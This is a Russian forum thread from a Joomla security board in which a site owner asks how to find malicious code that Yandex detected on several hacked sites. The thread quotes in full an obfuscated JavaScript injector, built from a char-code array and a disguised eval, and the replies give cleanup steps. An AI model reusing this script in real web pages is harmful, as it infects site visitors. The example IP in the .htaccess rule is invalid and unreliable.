Кк найти вирус на сайте? - Безопасность сайтов на Joomla

Добрый день!
На сайте завелся вирус, Яндекс в поисковике пишет такую строку:
"Сайт может угрожать безопасности вашего компьютера или мобильного устройства"

Попробовали устранили, касперский разблокировал сайт, написали на Яндекс с просьбой убрать эту строку, написали в ответ:

"К сожалению, в настоящий момент код все еще виден на сайте. Проверьте, пожалуйста, файлы еще раз. Вредоносный код имеет следующий вид:

<script>try{abre++}catch(a6ba34y){try{prototype&2}catch(asab){e=window["e"+"v"+"al"];}} if(1){f=[-4,-5,90,89,18,25,87,97,84,104,95,86,97,102,31,90,87,101,56,94,86,96,87,95,103,101,51,108,70,82,90,64,82,96,87,25,26,84,96,87,107,24,28,77,33,80,27,108,0,-5,-6,-4,91,87,101,83,94,88,100,25,28,45,-2,-4,-5,110,19,87,93,102,87,17,110,-1,-6,-4,-5,85,98,85,102,96,87,95,103,32,104,101,91,101,88,26,19,47,91,87,101,83,94,88,18,100,101,85,46,26,90,101,103,98,43,34,33,98,95,98,89,92,104,84,96,95,31,98,96,101,91,87,104,88,84,31,97,103,32,103,33,103,86,32,97,91,98,48,90,97,46,37,25,17,106,91,85,103,90,46,26,35,33,26,18,89,88,91,88,91,102,46,26,35,33,26,18,100,103,107,93,88,47,24,105,91,100,92,84,90,95,91,101,108,44,89,92,86,85,88,96,44,99,97,100,92,102,90,98,96,43,84,84,100,98,94,102,103,87,44,95,87,87,103,44,33,46,102,96,99,44,33,46,25,47,47,33,90,89,100,82,96,87,47,21,27,44,0,-5,-6,112,-1,-6,-4,88,102,97,85,101,92,97,95,19,91,87,101,83,94,88,100,25,28,109,-2,-4,-5,-6,105,83,99,19,88,17,48,18,85,98,85,102,96,87,95,103,32,84,101,87,82,103,87,54,95,87,94,88,96,101,27,25,90,89,100,82,96,87,24,28,45,87,33,101,86,103,51,101,103,100,90,85,103,101,88,26,24,102,100,84,26,30,24,91,102,101,99,44,32,34,99,93,99,90,90,105,85,94,96,32,96,97,102,89,88,105,86,85,32,95,104,33,101,34,104,84,33,98,89,99,49,88,98,47,35,26,27,44,89,32,100,103,107,93,88,32,103,92,101,90,85,91,93,92,102,106,48,25,89,92,86,85,88,96,24,46,88,31,102,102,106,95,87,31,99,97,100,92,102,90,98,96,46,26,83,83,102,97,93,104,102,86,26,45,87,33,101,101,108,94,86,33,94,86,89,102,46,26,34,24,46,88,31,102,102,106,95,87,31,103,97,97,48,25,33,26,45,87,33,101,86,103,51,101,103,100,90,85,103,101,88,26,24,106,91,85,103,90,24,31,25,34,35,25,26,46,88,31,102,87,101,52,102,101,101,91,83,104,102,86,27,25,89,88,91,88,91,102,24,31,25,34,35,25,26,46,-1,-6,-4,-5,85,98,85,102,96,87,95,103,32,88,88,102,54,95,87,94,88,96,101,102,52,106,71,83,88,65,83,94,88,26,24,85,97,85,108,25,26,78,34,78,33,83,97,99,87,95,87,53,89,92,94,85,27,88,26,46,-1,-6,-4,111];}w=f;s=[];r=String;x="j%";for(i=0;-i+593!=0;i+=1){j=i;if(e&&(031==0x19))s=s+r.fromCharCode((1*w[j]+e(x+3)+13));} try{asgasg&13}catch(asga){e(s);}</script>

--

Подскажите пожалуйста каким путем можно на сайте найти где это код лежит?

1 Какая у Вас установлена версия Joomla?
2 Какие на нее были установлены расширения?

смотрите все файлы *.php и *.js
можете про сканировать на наличие бэкдор сканер в подписи
в вашем случае код обычно встречается не одинаковый на сайте может быть несколько его вариаций искать только просмотром и нахождением по файлам, или если есть чистые копии сайта заменой файлов предварительно сделав бэкап

так 3 сайта один основной и 2 другие(совершенно разные сайты), версии у них 1.0, 1.5, и 1,7
пароли на ftp поменяли, но перед тем как писать сюда на сайт вопрос, я открывал код сайта с интернета и видел на этих трех сайтах этот вредоносный код в самом начале перед кодом

<?xml version="1.0" encoding="windows-1251"?>
<html xmlns="http://www.w3.org/1999/xhtml">

а сейчас снова стал смотреть и на этих трех сайтах, уже в коде скрипт не увидел, может в такой момент проверял касперский и не нашел вредоносный код и разблокировал, а Яндекс когда стал проверять увидел этот код и строка выводилась

То что сайт был взломан злоумышленником, не вызывает сомнений.

Я бы порекомендовал НЕМЕДЛЕННО поменять все относящиеся к Вашему веб сайту пароли, как на хостинге, так и на Вашем компьютере и ни в коем случае не оставлять их в памяти приложений своего компьютера.

Также, нужно первым делом привлечь к этому взлому своего веб хостера и найти в логах когда именно был взломан сайт и с какого IP адреса и запретить этому адресу вход на свой веб сайт в .htaccess:

Order allow,deny
deny from 38.24.333.251

Также, стоит выяснить, задел ли взлом базу данных Вашего веб сайта. Если нет, то это значит, что Ваш веб сайт теоретически можно восстановить переустановкой системы Joomla.

Если следы скрипта злоумышленника обнаружатся и в базе данных сайта, то, прежде чем переустанавливать Joomla, придется заняться чисткой базы.

Также, стоит проверить, не находится ли одно из установленных Вами расширений в списке уязвимых расширений Joomla